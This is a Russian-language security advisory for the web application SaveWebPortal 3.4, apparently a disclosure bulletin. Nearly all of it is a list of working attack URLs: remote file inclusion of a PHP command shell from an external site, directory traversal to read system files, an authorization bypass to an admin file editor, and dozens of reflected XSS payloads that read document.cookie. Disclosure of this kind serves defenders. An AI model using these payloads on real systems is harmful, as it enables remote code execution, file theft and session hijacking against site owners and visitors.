Программа: SaveWebPortal 3.4
Удаленный пользователь может выполнить произвольный код на целевой системе, получить неавторизованный административный доступ и выполнить XSS нападение:
1. Выполнение произвольного кода:
http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site ]/cmd.gif%00
http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00
Где cmd.gif:
<?php system('[some command]'); ?>
2. Удаленный пользователь может включить и выполнить произвольные PHP файлы на целевой системе:
http://[target]/saveweb/menu_dx.php?SITE_Path= ../../../../../[script].php%00
http://[ target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00
3. Удаленный пользователь также может просматривать не PHP файлы на целевой системе:
http://[target]/saveweb/menu_dx.php?SITE_Path= ../../../../../boot.ini%00
http://[target]/saveweb/menu_sx.php?CONTENTS _Dir=../../../../../boot.ini%00
4. Удаленный пользователь может обойти авторизацию и получить административный доступ:
http://[target]/saveweb/admin/PhpMyExplorer/ editerfichier.php?chemin=.&fich
ier= header.php&type=Source
5. С административным доступом, удаленный пользователь может внедрить произвольный PHP код в 'header.php' файл (или подобный файл) и затем заставить Web сервер выполнить этот код.
В нескольких сценариях обнаружена XSS уязвимость:
http://[target]/saveweb/footer.p hp?TABLE_Width=> <script>alert(document.cookie)</script>
http://[target]/saveweb/footer.php?SITE_Author_ Domain=><script>alert(document.cookie)</script>
http://[target]/s aveweb/footer.php?SITE_Author=> <script>alert(document.cookie)</script>
http://[target]/saveweb/footer.php?L_Info=><script> alert(document.cookie)</script>
http://[target]/saveweb/footer.php?L_Help=><script> alert(document.cookie)</script>
http://[target]/saveweb/header.php?TABLE_Width =><script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?L_Visitors=> <script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?count=><script> alert(document.cookie)</script>
http://[target]/saveweb/header.php?SITE_Logo="> <script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?BANNER_Url ="><script>alert(document.cookie)</script>
http://[target]/saveweb/header.php?L_Sunday="} </script><script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Monday="} </script><script>alert(document.cookie)</script><!--
[etc.]
http://[target]/saveweb/header.php?L_January="} </script><script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_February="} </script><script>alert(document.cookie)</script><!--
[etc.]
http://[target]/saveweb/header.php?IMAGES_Url="> <script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Info="> <script>alert(document.cookie)</script><!--
http://[target]/saveweb/header.php?L_Help="> <script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_InsertCorrectly= <script>alert(document.cookie)</script>
http://[target]/saveweb/menu_dx.php?L_MENUDX_Login =<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_Username =<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_ Password=<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_Ok=<script> alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?IMAGES_Url="> <script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_ Registration="><script>alert(document.cookie)
</script><!--
http://[target]/saveweb/menu_dx.php?BANNER_Url="><script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUSX_ Newsletter=<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_dx.php?L_MENUDX_InsertEMail =<script>alert(document.cookie)</script><!--
http://[target]/saveweb/menu_sx.php?L_InsertNOK3Char=");} </script><script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Channels =<script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Home =<script>alert(document.cookie)</script><script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Archive =<script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_Search= <script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_Ok= <script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?IMAGES_Url= "><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Services="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_Links= "><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Newsletter="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Polls="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ ECards="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Downloads="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Community="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Forum="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Chat="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Nicknames="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Membership="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Login="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ UserProfile="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ PasswordForgot="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Logout="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Contacts="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ Guestbook="><script>alert(document.cookie)</script>
http://[target]/saveweb/menu_sx.php?L_MENUSX_ ContactUs="><script>alert(document.cookie)</script>